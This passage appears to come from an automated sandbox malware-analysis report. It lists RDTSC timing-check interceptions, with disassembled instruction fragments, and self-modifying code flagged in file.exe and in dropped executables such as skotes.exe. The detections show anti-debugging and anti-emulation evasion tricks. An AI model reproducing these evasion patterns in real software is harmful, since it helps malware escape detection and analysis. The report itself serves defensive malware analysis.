Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A002C1 second address: 4A002DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A002DC second address: 4A0030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7E2CEC3D3Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0030D second address: 4A00311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00311 second address: 4A00360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7E2CEC3D40h 0x0000000c xor ecx, 44E86B78h 0x00000012 jmp 00007F7E2CEC3D3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 je 00007F7E9FB62026h 0x0000001f jmp 00007F7E2CEC3D46h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00360 second address: 4A00364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00364 second address: 4A00381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00381 second address: 4A00387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00387 second address: 4A0038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F06E4 second address: 49F06F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F06F3 second address: 49F0718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0718 second address: 49F071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F071D second address: 49F0742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 93h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7E2CEC3D43h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov si, DE11h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0742 second address: 49F07A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEB1B1Ch 0x0000000b popad 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 movzx esi, bx 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, 554EEB57h 0x0000001d mov eax, 0D6CE5F3h 0x00000022 popad 0x00000023 mov dword ptr [esp], ebx 0x00000026 jmp 00007F7E2CEB1B26h 0x0000002b xchg eax, esi 0x0000002c jmp 00007F7E2CEB1B20h 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ebx, esi 0x00000036 popad 0x00000037 mov edx, ecx 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F07A6 second address: 49F07AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F07AC second address: 49F07E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F7E2CEB1B20h 0x00000011 sub ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CEB1B1Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F07E7 second address: 49F0865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CEC3D44h 0x00000012 jmp 00007F7E2CEC3D45h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F7E2CEC3D40h 0x0000001e or eax, 3DBF26D8h 0x00000024 jmp 00007F7E2CEC3D3Bh 0x00000029 popfd 0x0000002a popad 0x0000002b je 00007F7E9FB6987Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F7E2CEC3D45h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0865 second address: 49F0897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F7E2CEB1B27h 0x0000001a pop ecx 0x0000001b mov bx, DCDCh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0897 second address: 49F089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F089D second address: 49F08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F08A1 second address: 49F08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F7E2CEC3D3Dh 0x00000014 pop ecx 0x00000015 mov ax, bx 0x00000018 popad 0x00000019 je 00007F7E9FB69810h 0x0000001f jmp 00007F7E2CEC3D43h 0x00000024 test byte ptr [77726968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F08EF second address: 49F08F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F08F3 second address: 49F08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F08F9 second address: 49F08FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F08FF second address: 49F092E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F7E9FB697E5h 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov edi, 6D6433CEh 0x00000017 popad 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7E2CEC3D41h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F092E second address: 49F094A instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F7E2CEB1B1Dh 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F094A second address: 49F0950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0950 second address: 49F0A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CEB1B1Bh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 00F240BBh 0x00000016 pushfd 0x00000017 jmp 00007F7E2CEB1B20h 0x0000001c adc al, 00000008h 0x0000001f jmp 00007F7E2CEB1B1Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F7E2CEB1B26h 0x0000002c push eax 0x0000002d jmp 00007F7E2CEB1B1Bh 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 mov esi, 28B4A07Bh 0x00000039 mov ebx, esi 0x0000003b popad 0x0000003c push dword ptr [ebp+14h] 0x0000003f pushad 0x00000040 movzx eax, dx 0x00000043 movsx ebx, ax 0x00000046 popad 0x00000047 push dword ptr [ebp+10h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F7E2CEB1B29h 0x00000052 pop esi 0x00000053 call 00007F7E2CEB1B21h 0x00000058 pop ecx 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0A05 second address: 49F0A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0A68 second address: 49F0A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00CEC second address: 4A00CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00CF0 second address: 4A00CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00CF6 second address: 4A00D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 xor ecx, 31F2F848h 0x0000000f jmp 00007F7E2CEC3D3Bh 0x00000014 popfd 0x00000015 jmp 00007F7E2CEC3D48h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00D3C second address: 4A00D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A20 second address: 4A00A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A24 second address: 4A00A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A2A second address: 4A00A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A5A second address: 4A00A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A60 second address: 4A00A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A6F second address: 4A00AEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F7E2CEB1B21h 0x0000000d xor eax, 626D3B56h 0x00000013 jmp 00007F7E2CEB1B21h 0x00000018 popfd 0x00000019 movzx esi, bx 0x0000001c popad 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F7E2CEB1B23h 0x00000024 mov ebp, esp 0x00000026 jmp 00007F7E2CEB1B26h 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7E2CEB1B27h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00AEB second address: 4A00AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00AF1 second address: 4A00AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80654 second address: 4A8065A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8065A second address: 4A806BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F7E2CEB1B24h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F7E2CEB1B20h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7E2CEB1B1Dh 0x00000021 xor ecx, 3F4D9876h 0x00000027 jmp 00007F7E2CEB1B21h 0x0000002c popfd 0x0000002d mov eax, 119D8367h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A806BB second address: 4A806DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 58FEh 0x00000007 call 00007F7E2CEC3D3Fh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A806DC second address: 4A806EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70ABC second address: 4A70AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70AC2 second address: 4A70AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70AC6 second address: 4A70ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEC3D3Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70ADD second address: 4A70AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70AE3 second address: 4A70AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70AE7 second address: 4A70B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CEB1B29h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 movsx ebx, ax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70892 second address: 4A70896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70896 second address: 4A708DE instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CEB1B1Fh 0x00000010 sub ch, FFFFFFAEh 0x00000013 jmp 00007F7E2CEB1B29h 0x00000018 popfd 0x00000019 push eax 0x0000001a mov si, bx 0x0000001d pop edi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edi, cx 0x00000026 mov di, si 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A708DE second address: 4A708F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1011F second address: 4A10124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10124 second address: 4A1013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1013C second address: 4A10140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70CA9 second address: 4A70CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70CAF second address: 4A70CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F7E2CEB1B1Ch 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70CD9 second address: 4A70CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70CF0 second address: 4A70D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7E2CEB1B1Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007F7E2CEB1B1Eh 0x00000019 mov eax, 63BD58F1h 0x0000001e popad 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CEB1B23h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D4D second address: 4A70D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D65 second address: 4A70D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D82 second address: 4A70D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D88 second address: 4A70D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D8C second address: 4A70D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70D90 second address: 4A70DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F7E2CEB1B19h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70DA7 second address: 4A70DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70DAD second address: 4A70DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70DB3 second address: 4A70DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70DB7 second address: 4A70DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70DDA second address: 4A70DFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ch, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CEC3D42h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459443 second address: 459449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459449 second address: 45945C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnc 00007F7E2CEC3D36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45945C second address: 459469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F7E2CEB1B16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A206A5 second address: 4A206A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A206A9 second address: 4A206AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A206AD second address: 4A206B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A207D1 second address: 4A207E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A207E9 second address: 4A20810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEC3D42h 0x00000014 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2AEFDF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 44E5EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4D3AD6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 101EFDF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11BE5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1243AD6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: 8259D9 instructions caused by: Self-modifying code
